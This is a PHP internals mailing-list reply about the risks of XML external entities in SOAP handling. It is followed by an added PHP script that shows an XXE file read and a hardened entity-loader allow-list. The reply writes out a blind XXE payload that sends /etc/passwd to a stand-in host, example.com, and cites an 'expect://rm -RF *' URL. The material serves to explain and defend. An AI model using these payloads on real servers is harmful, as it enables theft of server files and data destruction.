Jake,


On Thu, Jul 30, 2015 at 1:06 PM, Jake <p...@freepanel.net> wrote:
> Hello
>
> Disabling this will (at least for me) cause SOAP related stuff to stop
> working as it was expected to work before!

The problem here is that imagine the following:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE roottag [
 <!ENTITY % file SYSTEM "file:///etc/passwd">
 <!ENTITY % dtd SYSTEM "http://example.com/evil1.dtd">
 %dtd;
]>
<roottag>&send;</roottag>

and then evil1.dtd:
<?xml version="1.0" encoding="UTF-8"?>
<!ENTITY % all "<!ENTITY send SYSTEM 'http://example.com/content?%file;'>">
%all;

The contents of /etc/passwd would be sent as the URL parameter to
http://example.com/content.

That works for any file that the server has access to.

And if you have the expect extension installed it could be MUCH worse.
You could use the URL "expect://rm -RF *" and boom goes the dynamite.

So yeah, while I completely get that some things like SOAP require
external entities, they are also *exceedingly* dangerous. And only to
be used with *extremely* trusted endpoints.

> <?php
> $wsdl = "https://www.some.tld/soap.php?wsdl";
>
> $soap = new SoapServer($wsdl, array(....));
>
> wsdl:
>
> <?xml version="1.0" encoding="utf-8"?>
> <wsdl:definitions xmlns:http="http://schemas.xmlsoap.org/wsdl/http/"
>                   xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/"
>                   xmlns:s="http://www.w3.org/2001/XMLSchema"
>                   xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/"
>                   xmlns:tm="http://microsoft.com/wsdl/mime/textMatching/"
>                   xmlns:mime="http://schemas.xmlsoap.org/wsdl/mime/"
>                   xmlns:wsdl="http://schemas.xmlsoap.org/wsdl/"
>                   xmlns:tns="http://www.some.tld/soap/muppet/user/1.0/"
>                   targetNamespace="http://www.some.tld/soap/muppet/user/1.0/">
>     <wsdl:types>
>         <s:schema targetNamespace="http://www.some.tld/soap/muppet/user/1.0/"
>                   xmlns:tns="http://www.some.tld/soap/muppet/user/1.0/"
>                   elementFormDefault="qualified">
>
> ...
>
> It fails with
>
> error to read external entity, failed while parsing external entity
> 'http://www.some.tld/muppet.php?wsdl'

I know that you want it to work, but this is actually a great place to
fail, because you're loading a trusted resource over HTTP. Meaning
that an attacker could MITM and inject malicious XML into the response,
and own your server without even needing to own the endpoint.

> ..
>
> I don't know if I understand this error correctly, but to me it looks like PHP on "www
> frontend" refuses to read WSDL/SOAP/XML from "www backend" because of this...
> Pretty much all of the SOAP idea is gone then..?

I thought SOAP was dead already.

Kidding aside, the vulnerability isn't super-well-known but also can
be extremely dangerous. Not can-be; is. So something to consider.

Anthony

-- 
PHP Internals - PHP Runtime Development Mailing List
To unsubscribe, visit: http://www.php.net/unsub.php
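The following PHP script is an added example and is not code from the thread above or from PHP itself. It shows the two halves of the discussion in one place: the local file read that LIBXML_NOENT makes possible (done against a constructed temp file so it runs offline), and a libxml_set_external_entity_loader() policy that lets only an https endpoint on an allow-listed host through, which is the "extremely trusted endpoints" case a SOAP deployment needs. The host name TRUSTED_WSDL_HOST and the function names are assumptions made for illustration.

```php
<?php
// Added example, not from the original thread or from PHP's own sources.
// TRUSTED_WSDL_HOST is an assumed, illustrative trusted endpoint.
declare(strict_types=1);

const TRUSTED_WSDL_HOST = 'www.some.tld';

// Constructed stand-in for /etc/passwd so the script runs without touching
// real system files.
$secret = tempnam(sys_get_temp_dir(), 'xxe');
file_put_contents($secret, "root:x:0:0:root:/root:/bin/bash\n");

// Constructed attacker-controlled document: a general entity that points at
// a local file, the in-band variant of the read described in the message.
$payload = "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n"
    . "<!DOCTYPE roottag [ <!ENTITY xxe SYSTEM \"file://{$secret}\"> ]>\n"
    . "<roottag>&xxe;</roottag>";

// Vulnerable parse: LIBXML_NOENT asks libxml to substitute entities, so the
// file contents are pulled into the document tree.
function parseUnsafe(string $xml): string
{
    $dom = new DOMDocument();
    $dom->loadXML($xml, LIBXML_NOENT);
    return $dom->documentElement->textContent;
}

// Entity-loader policy: everything is denied except https:// to the one
// allow-listed host. file://, expect://, php:// and plain http:// never get
// through. Returning null makes libxml report "failed to load external entity".
function trustedEntityLoader(?string $publicId, ?string $systemId, array $context)
{
    $parts = $systemId === null ? false : parse_url($systemId);
    if ($parts === false
        || ($parts['scheme'] ?? '') !== 'https'
        || ($parts['host'] ?? '') !== TRUSTED_WSDL_HOST) {
        error_log('blocked external entity: ' . var_export($systemId, true));
        return null;
    }
    return $systemId; // libxml fetches it through the normal stream wrappers
}

// Hardened parse: install the policy, never pass LIBXML_NOENT, keep
// LIBXML_NONET as a second fence, and refuse any document carrying a DOCTYPE,
// because a SOAP envelope or WSDL you control never needs one.
function parseHardened(string $xml): string
{
    libxml_set_external_entity_loader('trustedEntityLoader');
    libxml_use_internal_errors(true);
    $dom = new DOMDocument();
    $ok = $dom->loadXML($xml, LIBXML_NONET);
    if (!$ok || $dom->doctype !== null) {
        libxml_clear_errors();
        throw new RuntimeException('refusing XML with a DOCTYPE or unloadable entities');
    }
    return $dom->documentElement->textContent;
}

echo "unsafe:   ", trim(parseUnsafe($payload)), "\n";   // the "secret" file's contents
try {
    parseHardened($payload);
} catch (RuntimeException $e) {
    echo "hardened: ", $e->getMessage(), "\n";
}
unlink($secret);
```

The loader policy is the part that matters for the SoapServer case: with it installed, a WSDL fetched from https://www.some.tld/ still loads, while the http:// URL from the error message in the thread is refused rather than silently trusted, and an entity pointing at file:// or expect:// is refused wherever it appears. libxml_disable_entity_loader() switches everything off and is deprecated in PHP 8, where external entities are not fetched unless LIBXML_NOENT is passed; the loader callback is the finer-grained replacement for code that genuinely needs one remote endpoint.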